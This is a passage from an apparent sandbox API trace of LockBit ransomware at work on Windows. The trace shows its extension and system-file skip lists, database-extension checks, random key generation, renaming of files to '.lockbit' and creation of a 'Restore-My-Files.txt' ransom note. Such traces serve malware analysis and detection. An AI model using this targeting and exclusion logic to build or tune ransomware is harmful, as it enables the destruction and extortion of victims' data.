NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.515] malloc (_Size=0xa6) returned 0x77d800 [0106.516] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.526] free (_Block=0x77d800) [0106.526] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.526] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.526] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b147c00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b147c00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x30e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00008_.WMF", cAlternateFileName="")) returned 1 [0106.526] lstrcmpiW (lpString1=".", lpString2="BL00008_.WMF") returned -1 [0106.526] lstrcmpiW (lpString1="..", lpString2="BL00008_.WMF") returned -1 [0106.526] PathFindExtensionW (pszPath="BL00008_.WMF") returned=".WMF" [0106.526] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.526] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.526] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.526] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.527] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.527] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00008_.WMF") returned 1 [0106.528] lstrcmpiW (lpString1="ntldr", lpString2="BL00008_.WMF") returned 1 [0106.528] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00008_.WMF") returned 1 [0106.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00008_.WMF") returned 1 [0106.528] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00008_.WMF") returned -1 [0106.528] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00008_.WMF") returned 1 [0106.529] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00008_.WMF") returned 1 [0106.529] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.529] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned=".WMF" [0106.529] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.529] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.529] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.530] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.530] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.lockbit") returned 72 [0106.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.532] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.532] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.532] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12520) returned 1 [0106.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.533] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.539] malloc (_Size=0xa6) returned 0x77d800 [0106.539] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.542] free (_Block=0x77d800) [0106.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.542] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851e9b00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x851e9b00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00012_.WMF", cAlternateFileName="")) returned 1 [0106.542] lstrcmpiW (lpString1=".", lpString2="BL00012_.WMF") returned -1 [0106.542] lstrcmpiW (lpString1="..", lpString2="BL00012_.WMF") returned -1 [0106.542] PathFindExtensionW (pszPath="BL00012_.WMF") returned=".WMF" [0106.542] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.542] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.542] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.542] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.542] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.542] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.543] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.543] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.544] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00012_.WMF") returned 1 [0106.544] lstrcmpiW (lpString1="ntldr", lpString2="BL00012_.WMF") returned 1 [0106.544] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00012_.WMF") returned 1 [0106.544] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00012_.WMF") returned 1 [0106.544] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00012_.WMF") returned -1 [0106.545] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00012_.WMF") returned 1 [0106.545] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00012_.WMF") returned 1 [0106.545] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.545] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned=".WMF" [0106.545] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.545] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.545] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.546] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.546] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.lockbit") returned 72 [0106.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.566] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.566] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.566] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9818) returned 1 [0106.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.567] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.569] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.569] malloc (_Size=0xa6) returned 0x77d800 [0106.569] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.570] free (_Block=0x77d800) [0106.570] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.570] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.571] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c98800, ftCreationTime.dwHighDateTime=0x1bd4b2b, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1c98800, ftLastWriteTime.dwHighDateTime=0x1bd4b2b, nFileSizeHigh=0x0, nFileSizeLow=0x1eb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00045_.WMF", cAlternateFileName="")) returned 1 [0106.571] lstrcmpiW (lpString1=".", lpString2="BL00045_.WMF") returned -1 [0106.571] lstrcmpiW (lpString1="..", lpString2="BL00045_.WMF") returned -1 [0106.571] PathFindExtensionW (pszPath="BL00045_.WMF") returned=".WMF" [0106.571] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.571] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.572] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.572] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.573] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00045_.WMF") returned 1 [0106.573] lstrcmpiW (lpString1="ntldr", lpString2="BL00045_.WMF") returned 1 [0106.573] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00045_.WMF") returned 1 [0106.573] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00045_.WMF") returned 1 [0106.573] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00045_.WMF") returned -1 [0106.573] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00045_.WMF") returned 1 [0106.573] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00045_.WMF") returned 1 [0106.574] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.574] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned=".WMF" [0106.574] lstrcmpiW (lpString1=".rar", 